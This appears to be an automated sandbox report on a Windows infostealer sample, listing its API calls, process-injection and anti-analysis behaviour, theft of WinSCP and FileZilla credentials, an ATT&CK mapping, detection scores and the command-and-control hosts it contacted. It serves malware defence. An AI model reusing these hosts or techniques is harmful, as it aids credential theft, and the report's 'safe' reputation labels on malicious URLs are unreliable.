                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_00198995 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00198995
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_001814AD mov eax, dword ptr fs:[00000030h]0_2_001814AD
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0018148A mov eax, dword ptr fs:[00000030h]0_2_0018148A
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_001814A2 mov eax, dword ptr fs:[00000030h]0_2_001814A2
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_001985DB mov eax, dword ptr fs:[00000030h]0_2_001985DB
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_001985DC mov eax, dword ptr fs:[00000030h]0_2_001985DC
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_001910EE GetProcessHeap,HeapAlloc,GlobalMemoryStatusEx,wsprintfA,0_2_001910EE
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0019D05A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0019D05A
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0019D9DC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0019D9DC
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_001A767E SetUnhandledExceptionFilter,0_2_001A767E

                          HIPS / PFW / Operating System Protection Evasion

                          Source: Yara matchFile source: aZm1EZ2IYr.exe, type: SAMPLE
                          Source: Yara matchFile source: Process Memory Space: aZm1EZ2IYr.exe PID: 7336, type: MEMORYSTR
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0018F51F _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,0_2_0018F51F
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_00192554 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00192554
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0019247D __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_0019247D
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0018111D cpuid 0_2_0018111D
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00190DB0
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_001AB11C
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,0_2_001AB211
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,0_2_001AB2B8
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_001A9AA0
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,0_2_001AB313
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,0_2_001AAB90
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,0_2_001A5433
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,0_2_001A74EC
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,0_2_001AB4E4
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_001A9DBE
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,0_2_001AE5BF
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: EnumSystemLocalesA,0_2_001AB5A6
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_001AB5D0
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_001A75C6
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_001A8E14
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_001AB637
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,0_2_001AB673
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: GetLocaleInfoA,0_2_001AE6F4
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0019C00B lstrcpyA,SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime,0_2_0019C00B
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_00190C28 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00190C28
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_00190D03 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00190D03
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                          Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                          Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                          Source: aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003A6E000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                          Stealing of Sensitive Information

                          Source: Yara matchFile source: aZm1EZ2IYr.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.2.aZm1EZ2IYr.exe.180000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.aZm1EZ2IYr.exe.180000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.1668857258.00000000001B0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: aZm1EZ2IYr.exe PID: 7336, type: MEMORYSTR
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

                          Remote Access Functionality

                          Source: Yara matchFile source: aZm1EZ2IYr.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.2.aZm1EZ2IYr.exe.180000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.aZm1EZ2IYr.exe.180000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.1668857258.00000000001B0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: aZm1EZ2IYr.exe PID: 7336, type: MEMORYSTR
                          MITRE ATT&CK Matrix (one column per tactic; a number in parentheses is the count of matching indicators shown beside that technique)

                          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                          Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation (1) | DLL Side-Loading (1) | Process Injection (21) | Masquerading (1) | OS Credential Dumping (1) | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Encrypted Channel (21) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                          Credentials | Domains | Default Accounts | Native API (1) | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (1) | Credentials in Registry (1) | Security Software Discovery (161) | Remote Desktop Protocol | Data from Local System (1) | Ingress Tool Transfer (2) | Exfiltration Over Bluetooth | Network Denial of Service
                          Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Process Injection (21) | Security Account Manager | Virtualization/Sandbox Evasion (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
                          Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Deobfuscate/Decode Files or Information (1) | NTDS | Process Discovery (12) | Distributed Component Object Model | Input Capture | Application Layer Protocol (113) | Traffic Duplication | Data Destruction
                          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Obfuscated Files or Information (3) | LSA Secrets | Application Window Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | DLL Side-Loading (1) | Cached Domain Credentials | Account Discovery (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | System Owner/User Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                          Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | File and Directory Discovery (3) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                          Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | System Information Discovery (55) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

                          Source | Detection | Scanner | Label
                          aZm1EZ2IYr.exe | 74% | ReversingLabs | Win32.Infostealer.Tinba
                          aZm1EZ2IYr.exe | 60% | Virustotal |
                          aZm1EZ2IYr.exe | 100% | Joe Sandbox ML |
                          No Antivirus matches
                          No Antivirus matches
                          Source | Detection | Scanner | Label
                          steamcommunity.com | 0% | Virustotal |
                          t.me | 0% | Virustotal |
                          cowod.hopto.org | 12% | Virustotal |
                          Source | Detection | Scanner | Label
                          https://player.vimeo.com | 0% | URL Reputation | safe
                          http://cowod.hopto.org | 0% | URL Reputation | safe
                          https://store.steampowered.com/subscriber_agreement/ | 0% | URL Reputation | safe
                          https://www.gstatic.cn/recaptcha/ | 0% | URL Reputation | safe
                          http://www.valvesoftware.com/legal.htm | 0% | URL Reputation | safe
                          http://cowod.hopto.org_DEBUG.zip/c | 0% | URL Reputation | safe
                          http://cowod.hopto. | 0% | URL Reputation | safe
                          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | 0% | URL Reputation | safe
                          http://cowod.hopto | 0% | URL Reputation | safe
                          https://steam.tv/ | 0% | URL Reputation | safe
                          https://store.steampowered.com/points/shop/ | 0% | URL Reputation | safe
                          https://lv.queniujq.cn | 0% | URL Reputation | safe
                          https://store.steampowered.com/privacy_agreement/ | 0% | URL Reputation | safe
                          https://checkout.steampowered.com/ | 0% | URL Reputation | safe
                          https://store.steampowered.com/; | 0% | URL Reputation | safe
                          https://store.steampowered.com/about/ | 0% | URL Reputation | safe
                          https://help.steampowered.com/en/ | 0% | URL Reputation | safe
                          https://store.steampowered.com/news/ | 0% | URL Reputation | safe
                          https://recaptcha.net/recaptcha/; | 0% | URL Reputation | safe
                          https://store.steampowered.com/stats/ | 0% | URL Reputation | safe
                          https://medal.tv | 0% | URL Reputation | safe
                          https://broadcast.st.dl.eccdnx.com | 0% | URL Reputation | safe
                          https://store.steampowered.com/steam_refunds/ | 0% | URL Reputation | safe
                          https://login.steampowered.com/ | 0% | URL Reputation | safe
                          http://cowod.hopto.org/ | 0% | URL Reputation | safe
                          https://recaptcha.net | 0% | URL Reputation | safe
                          http://upx.sf.net | 0% | URL Reputation | safe
                          https://store.steampowered.com/ | 0% | URL Reputation | safe
                          http://cowod.hopto.org/p | 7% | Virustotal |
                          https://steamcommunity.com/login/home/?goto=profiles%2F76561199786602107 | 0% | Virustotal |
                          https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=UuGFpt56D9L4&l= | 0% | Virustotal |
                          https://steamcommunity.com/?subsection=broadcasts | 0% | Virustotal |
                          Name | IP | Active | Malicious | Antivirus Detection | Reputation
                          steamcommunity.com | 104.102.49.254 | true | true | | unknown
                          t.me | 149.154.167.99 | true | false | | unknown
                          cowod.hopto.org | unknown | unknown | false | | unknown
                          Name | Malicious | Antivirus Detection | Reputation
                          https://t.me/lpnjoke | false | | unknown
                          https://65.109.142.154/ | false | | unknown
                          https://steamcommunity.com/profiles/76561199786602107 | true | | unknown
                          Name | Source | Malicious | Antivirus Detection | Reputation
                          https://player.vimeo.com | aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                          https://steamcommunity.com/login/home/?goto=profiles%2F76561199786602107 | 76561199786602107[1].htm.0.dr | false | | unknown
                          https://steamcommunity.com/?subsection=broadcasts | aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | false | | unknown
                          http://cowod.hopto.org | aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp | true | URL Reputation: safe | unknown
                          https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV | aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | false | | unknown
                          http://cowod.hopto.org/p | aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003B3D000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                          https://store.steampowered.com/subscriber_agreement/ | aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | false | URL Reputation: safe | unknown
                          https://www.gstatic.cn/recaptcha/ | aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                          https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=UuGFpt56D9L4&l= | aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | false | | unknown
                          https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli | aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | false | | unknown
                          https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub& | aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | false | | unknown
                          https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=jq1jQyX1843y&amp | aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | false | | unknown
                          https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE | aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | false | | unknown
                          http://www.valvesoftware.com/legal.htm | aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | false
                                          • URL Reputation: safe
                                          unknown
                                          https://www.youtube.comaZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://t.me/lpnjoke4/iaZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://www.google.comaZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                http://cowod.hopto.org_DEBUG.zip/caZm1EZ2IYr.exetrue
                                                • URL Reputation: safe
                                                unknown
                                                http://cowod.hopto.orgclass=aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmptrue
                                                  unknown
                                                  http://cowod.hopto.aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackaZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://t.me/lpnjokeg0b4cMozilla/5.0aZm1EZ2IYr.exefalse
                                                    unknown
                                                    http://cowod.hoptoaZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://community.cloudflare.steamstatic.com/public/css/appaZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpfalse
                                                      unknown
                                                      https://65.109.142.15476561199786602107[1].htm.0.drfalse
                                                        unknown
